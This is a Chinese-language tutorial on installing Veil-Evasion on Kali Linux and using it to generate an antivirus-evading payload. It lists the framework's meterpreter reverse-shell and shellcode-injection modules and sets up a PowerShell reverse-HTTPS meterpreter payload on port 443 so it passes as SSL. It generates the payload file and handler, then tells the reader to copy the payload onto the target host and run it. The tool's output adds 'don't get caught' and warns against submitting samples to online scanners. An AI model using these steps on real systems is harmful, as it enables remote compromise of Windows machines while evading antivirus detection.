Kali Linux下Veil安装与使用的方法
Veil是一款绕过杀毒软件的payload生成器,今天我将给大家分享如何安装,安装方法有以下几种,
一、通过建立目录 从Git下载源码安装,
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd veil-Evasion/
bash setup/setup.sh –s
源码下载完成,切换到Setup目录,运行bash脚本进行安装,所有过程全部默认即可。
二、通过apt-get install 安装root@kali:/# apt-get install veil
正在读取软件包列表… 完成
正在分析软件包的依赖关系树
正在读取状态信息… 完成
下列软件包是自动安装的并且现在不需要了:
python-bitarray python-bloomfilter
Use ‘apt-get autoremove’ to remove them.
将会安装下列额外的软件包:
veil-evasion
下列【新】软件包将被安装:
veil veil-evasion
升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 43 个软件包未被升级。
需要下载 5,367 kB 的软件包。
解压缩后会消耗掉 16.5 MB 的额外空间。
您希望继续执行吗?[Y/n]y
获取:1 http://mirrors.ustc.edu.cn/kali/ kali/main veil-evasion amd64 2.20-0kali1 [5,360 kB]
获取:2 http://mirrors.ustc.edu.cn/kali/ kali/main veil amd64 2.20-0kali1 [6,570 B]
下载 5,367 kB,耗时 6秒 (782 kB/s)
Selecting previously unselected package veil-evasion.
(正在读取数据库 … 系统当前共安装有 340231 个文件和目录。)
正在解压缩 veil-evasion (从 …/veil-evasion_2.20-0kali1_amd64.deb) …
Selecting previously unselected package veil.
正在解压缩 veil (从 …/veil_2.20-0kali1_amd64.deb) …
正在设置 veil-evasion (2.20-0kali1) …
正在设置 veil (2.20-0kali1) …
三、启动并简单使得切换至安装目录 ,或者任意终端输入veil 即可运行列出所有模块:
[menu>>]: lists
=========================================================================
Veil-Evasion | [Version]: 2.22.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Available Payloads:
1) auxiliary/coldwar_wrapper
2) auxiliary/pyinstaller_wrapper
3) c/meterpreter/rev_http
4) c/meterpreter/rev_http_service
5) c/meterpreter/rev_tcp
6) c/meterpreter/rev_tcp_service
7) c/shellcode_inject/flatc
8) cs/meterpreter/rev_http
9) cs/meterpreter/rev_https
10) cs/meterpreter/rev_tcp
11) cs/shellcode_inject/base64_substitution
12) cs/shellcode_inject/virtual
13) go/meterpreter/rev_http
14) go/meterpreter/rev_https
15) go/meterpreter/rev_tcp
16) go/shellcode_inject/virtual
17) native/backdoor_factory
18) native/hyperion
19) native/pe_scrambler
20) powershell/meterpreter/rev_http
21) powershell/meterpreter/rev_https
22) powershell/meterpreter/rev_tcp
23) powershell/shellcode_inject/download_virtual
24) powershell/shellcode_inject/psexec_virtual
25) powershell/shellcode_inject/virtual
26) python/meterpreter/bind_tcp
27) python/meterpreter/rev_http
28) python/meterpreter/rev_http_contained
29) python/meterpreter/rev_https
30) python/meterpreter/rev_https_contained
31) python/meterpreter/rev_tcp
32) python/shellcode_inject/aes_encrypt
33) python/shellcode_inject/aes_encrypt_HTTPKEY_Request
34) python/shellcode_inject/arc_encrypt
35) python/shellcode_inject/base64_substitution
36) python/shellcode_inject/des_encrypt
37) python/shellcode_inject/download_inject
38) python/shellcode_inject/flat
39) python/shellcode_inject/letter_substitution
40) python/shellcode_inject/pidinject
41) ruby/meterpreter/rev_http
42) ruby/meterpreter/rev_http_contained
43) ruby/meterpreter/rev_https
44) ruby/meterpreter/rev_https_contained
45) ruby/meterpreter/rev_tcp
46) ruby/shellcode_inject/base64
47) ruby/shellcode_inject/flat
[menu>>]:
输入ID选择模块:
[menu>>]: 21
=========================================================================
Veil-Evasion | [Version]: 2.22.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: powershell/meterpreter/rev_https loaded
Required Options:
Name Current Value Description
---- ------------- -----------
LHOST IP of the Metasploit handler
LPORT 8443 Port of the Metasploit handler
PROXY N Use system proxy settings
Available Commands:
set Set a specific option value
info Show information about the payload
options Show payload's options
generate Generate payload
back Go to the main menu
exit exit Veil-Evasion
[powershell/meterpreter/rev_https>>]:
四、生成Payload我们来设定LHOST和LRORT这两个选项,本例子选择本次局域网中的WindowsXp做为靶机,ip:192.168.34.73 本地端口443(伪装为ssl)所以设定如下:
[powershell/meterpreter/rev_https>>]: set LHOST 192.168.34.220
[i] LHOST => 192.168.34.220
[powershell/meterpreter/rev_https>>]: set LPORT 443
[i] LPORT => 443
[powershell/meterpreter/rev_https>>]: generate
=========================================================================
Veil-Evasion | [Version]: 2.22.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[>] Please enter the base name for output files (default is 'payload'): kali-key
Language: powershell
Payload: powershell/meterpreter/rev_https
Required Options: LHOST=192.168.34.220 LPORT=443 PROXY=N
Payload File: /usr/share/veil-output/source/kali-key.bat
Handler File: /usr/share/veil-output/handlers/kali-key_handler.rc
[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! 😉
[>] Press any key to return to the main menu.
=========================================================================
Veil-Evasion | [Version]: 2.22.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Main Menu
47 payloads loaded
Available Commands:
use Use a specific payload
info Information on a specific payload
list List available payloads
update Update Veil-Evasion to the latest version
clean Clean out payload folders
checkvt Check payload hashes vs. VirusTotal
exit Exit Veil-Evasion
[menu>>]:
通过将生成的Payload复制到目标主机上进行运行
